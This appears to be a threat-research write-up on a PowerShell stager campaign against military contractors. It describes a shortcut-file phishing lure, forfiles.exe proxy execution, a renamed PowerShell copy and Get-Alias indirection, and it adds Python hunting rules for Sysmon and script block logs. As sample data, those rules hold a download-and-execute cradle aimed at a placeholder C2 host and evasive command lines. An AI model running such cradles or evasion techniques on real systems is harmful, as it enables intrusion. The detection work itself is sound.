The Securonix Threat Research team recently discovered a new covert attack campaign targeting multiple military/weapons contractor companies, including a likely strategic supplier to the F-35 Lightning II fighter aircraft. The stager was written mainly in PowerShell, and while PowerShell stagers are not unusual, this one featured an array of interesting tactics, persistence methodology, counter-forensics, and layer upon layer of obfuscation to hide its code.
The remote infrastructure, or command and control (C2), behind the stager was also relatively sophisticated.
Target Analysis and Attack Chain
The attack was carried out starting in late summer 2022, targeting at least two high-profile military contractor companies.
The overall attack chain can be seen in figure 1 on slide 2, which highlights the initial compromise phase of the attack.
Figure 1: Attack Chain (Slide 2)
Initial Infection: Shortcut to Code Execution
As with many targeted campaigns, the initial infection begins with a phishing email carrying a malicious attachment. As in the STIFF#BIZON campaign reported earlier this year, the email contains a compressed archive holding a shortcut file, in this case "Company & Benefits.pdf.lnk"; the double extension makes it look like a PDF on systems that hide known file extensions.
Figure 2: Company & Benefits.pdf.lnk (Slide 3)
The shortcut file does a few things to avoid detection. First, it hides its execution behind forfiles.exe, a living-off-the-land binary that proxies command execution, rather than invoking cmd.exe or powershell.exe directly.
It then copies the powershell.exe executable into C:\Windows, renames the copy to AdobeAcrobatPDFReader, and uses that copy to execute the rest of the PowerShell string, so a naive check on the process name never sees powershell.exe. Sysmon process-creation logs capture this, as shown in figure 3 on slide 4.
Figure 3: Windows logs showing renamed PowerShell.exe (Slide 4)
The rest of the PowerShell script retries in a loop, waiting 120 seconds between attempts, until a request completes without error. C2 communication is attempted against hxxps://terma[.]dev/0 to pull down the initial stager.
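Both the forfiles.exe proxy launch and the renamed copy of powershell.exe leave a distinctive trace in Sysmon process-creation events, because Sysmon reports OriginalFileName from the PE version resource rather than from the name on disk. The following Python is an added example, not code from Securonix or from the campaign: it runs two hunting rules over constructed Sysmon Event ID 1 records. The record IDs, parent processes and command lines are invented for illustration; only the file name AdobeAcrobatPDFReader comes from the text above. It goes slightly beyond the page in that the OriginalFileName check catches any renamed Windows interpreter, not just PowerShell.

```python
"""Hunt over Sysmon Event ID 1 (process creation) records for the two traces
described above: forfiles.exe acting as a proxy launcher, and a Windows
interpreter running under a file name that does not match its PE version
resource (OriginalFileName). The events are constructed, not real telemetry."""
import ntpath

# OriginalFileName value (lower-cased) -> on-disk names that are legitimate.
# Sysmon fills OriginalFileName from the PE version resource, so renaming the
# file on disk does not change it. Beyond the page: covers cmd, wscript, etc.
EXPECTED_NAMES = {
    "powershell.exe": {"powershell.exe"},
    "pwsh.dll": {"pwsh.exe"},          # PowerShell 7 reports pwsh.dll here
    "cmd.exe": {"cmd.exe"},
    "wscript.exe": {"wscript.exe"},
    "cscript.exe": {"cscript.exe"},
    "mshta.exe": {"mshta.exe"},
    "rundll32.exe": {"rundll32.exe"},
    "regsvr32.exe": {"regsvr32.exe"},
}

# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {   # normal interactive PowerShell: must not alert
        "RecordId": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe",
    },
    {   # forfiles.exe started by the shortcut handler (constructed arguments)
        "RecordId": 2,
        "Image": r"C:\Windows\System32\forfiles.exe",
        "OriginalFileName": "forfiles.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'forfiles /p C:\Windows /m AdobeAcrobatPDFReader /c "@path ..."',
    },
    {   # renamed powershell.exe copy launched by forfiles.exe
        "RecordId": 3,
        "Image": r"C:\Windows\AdobeAcrobatPDFReader",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\System32\forfiles.exe",
        "CommandLine": r"C:\Windows\AdobeAcrobatPDFReader -w hidden -c ...",
    },
    {   # generalization: cmd.exe renamed to look like a service host
        "RecordId": 4,
        "Image": r"C:\Users\Public\svchost.exe",
        "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"C:\Users\Public\svchost.exe /c whoami",
    },
    {   # a genuine executable living in C:\Windows root: must not alert
        "RecordId": 5,
        "Image": r"C:\Windows\notepad.exe",
        "OriginalFileName": "NOTEPAD.EXE",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
]


def renamed_interpreter(ev):
    """True when the PE says 'I am powershell.exe' (etc.) but the on-disk name differs."""
    orig = ev.get("OriginalFileName", "").lower()
    on_disk = ntpath.basename(ev.get("Image", "")).lower()
    expected = EXPECTED_NAMES.get(orig)
    return expected is not None and on_disk not in expected


def forfiles_proxy_exec(ev):
    """True when the parent process is forfiles.exe, i.e. LOLBin proxy execution."""
    return ntpath.basename(ev.get("ParentImage", "")).lower() == "forfiles.exe"


RULES = [
    ("forfiles_proxy_exec", forfiles_proxy_exec),
    ("renamed_interpreter", renamed_interpreter),
]


def hunt(events):
    """Return (rule_name, RecordId) for every rule that fires on each event."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev["RecordId"]))
    return hits


if __name__ == "__main__":
    for rule, record in hunt(SAMPLE_EVENTS):
        print(f"{rule}: Sysmon record {record}")
```

Record 3 fires both rules, which is the combination to alert on: a forfiles.exe child whose PE version resource identifies it as PowerShell. Windows Security event 4688 does not carry OriginalFileName, so this check needs Sysmon (or EDR telemetry that exposes the same field).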
Overall, this attack was relatively sophisticated, with the threat actor paying specific attention to opsec. Several relatively recent techniques were in play, some of which were unfamiliar and required additional analysis, such as using the PowerShell Get-Alias command to obtain a reference to Invoke-Expression and execute code through it rather than calling Invoke-Expression by name.
Using the registry, WMI event subscriptions, scheduled tasks, and LOLBins throughout the process was clever, and each of these needs to be monitored. While this was a very targeted attack, the tactics and techniques used are well known, and it is important to stay vigilant.
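To make the Get-Alias indirection concrete: in PowerShell, "Get-Alias iex" returns an AliasInfo object for Invoke-Expression, and "& (Get-Alias iex) $code" runs Invoke-Expression on $code without the script ever containing the cmdlet name, which defeats naive string matching on script block logs. The Python below is an added example, not Securonix's or the campaign's code: it resolves that indirection, plus a subset of PowerShell's default aliases, in script block log text before classifying it. The sample script blocks and the URL https://c2.example/0 are constructed for illustration.

```python
"""Normalize PowerShell script block log text so alias-based indirection,
including the Get-Alias trick, resolves to the underlying cmdlet names before
detection logic runs. Script blocks below are constructed, not real logs."""
import re

# Subset of PowerShell's built-in aliases (lower case -> cmdlet).
ALIASES = {
    "iex": "Invoke-Expression",
    "gal": "Get-Alias",
    "sal": "Set-Alias",
    "gc": "Get-Content",
    "iwr": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
    "sleep": "Start-Sleep",
    "sort": "Sort-Object",
    "ni": "New-Item",
    "cp": "Copy-Item",
    "ren": "Rename-Item",
}

# (Get-Alias iex) / (gal -Name iex): the returned AliasInfo can be invoked with
# & or ., so the script never contains a bare Invoke-Expression token.
_GET_ALIAS_NAME = re.compile(r"\(\s*(?:Get-Alias|gal)\s+(?:-Name\s+)?(\w+)\s*\)", re.I)
# (Get-Alias -Definition Invoke-Expression): yields the alias of that cmdlet,
# which behaves as the cmdlet itself when invoked.
_GET_ALIAS_DEF = re.compile(r"\(\s*(?:Get-Alias|gal)\s+-Definition\s+([\w-]+)\s*\)", re.I)
# Bare alias tokens (not part of a longer identifier such as Get-Content).
_BARE_ALIAS = re.compile(
    r"(?<![\w-])(" + "|".join(map(re.escape, ALIASES)) + r")(?![\w-])", re.I)

# Constructed sample script blocks (as they would appear in Event ID 4104).
SAMPLE_BLOCKS = [
    # download cradle executed through alias indirection; URL is a placeholder
    "$p = irm https://c2.example/0; & (gal iex) $p",
    # benign administrative command
    r"Get-ChildItem C:\Temp | sort Length",
    # dot-sourcing the resolved alias on the contents of a dropped file
    r". (Get-Alias -Name iex) (gc C:\Users\Public\x.txt)",
    # alias object parked in a variable; the definition is still spelled out
    "$a = gal -Definition Invoke-Expression; & $a 'Get-Date'",
]


def normalize(script: str) -> str:
    """Rewrite Get-Alias lookups and bare aliases to full cmdlet names."""
    script = _GET_ALIAS_DEF.sub(lambda m: m.group(1), script)
    script = _GET_ALIAS_NAME.sub(
        lambda m: ALIASES.get(m.group(1).lower(), m.group(1)), script)
    # Also expands alias words inside string literals; fine for detection,
    # not for a faithful deobfuscation.
    return _BARE_ALIAS.sub(lambda m: ALIASES[m.group(1).lower()], script)


def classify(script: str) -> set:
    """Tag a script block after normalization: IEX use, and IEX fed by a web fetch."""
    norm = normalize(script)
    tags = set()
    if re.search(r"\bInvoke-Expression\b", norm, re.I):
        tags.add("invoke-expression")
        if re.search(r"\bInvoke-(?:WebRequest|RestMethod)\b|DownloadString", norm, re.I):
            tags.add("download-cradle")
    return tags


if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        print(f"{sorted(classify(block)) or ['clean']}: {normalize(block)}")
```

Normalization has to happen before matching: the first sample contains neither "Invoke-Expression" nor a bare "iex" at command position, yet after resolving "(gal iex)" it is an ordinary download-and-execute cradle. Script block logging (Event ID 4104) is the data source this runs over, which is why it is in the recommendations below.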
Securonix Recommendations and Mitigations
- Avoid downloading unknown email attachments or shortcut (.lnk) files from untrusted sources.
- Deploy PowerShell script block logging (Event ID 4104) to assist in detection.
- Deploy additional process-level logging, such as Sysmon, for additional log coverage. In this campaign, the presence of Sysmon on the host also prevented the next-stage payload from executing.
- Pay specific attention to attempts to disable security monitoring tools, including SIEM agents.
- Scan endpoints using the Securonix seeder hunting queries below.
MITRE ATT&CK Techniques
| Tactic | Technique |
| --- | --- |
| Initial Access | T1566: Phishing |
| Execution | T1059.001: Command and Scripting Interpreter: PowerShell |
| Execution | T1047: Windows Management Instrumentation |
| Persistence | T1547: Boot or Logon Autostart Execution |
| Persistence | T1053: Scheduled Task/Job |
| Persistence | T1053.005: Scheduled Task/Job: Scheduled Task |
| Persistence | T1546.003: Event-Triggered Execution: Windows Management Instrumentation Event Subscription |
| Defense Evasion | T1027: Obfuscated Files or Information |
| Defense Evasion | T1140: Deobfuscate/Decode Files or Information |
| Defense Evasion | T1112: Modify Registry |
| Collection | T1005: Data from Local System |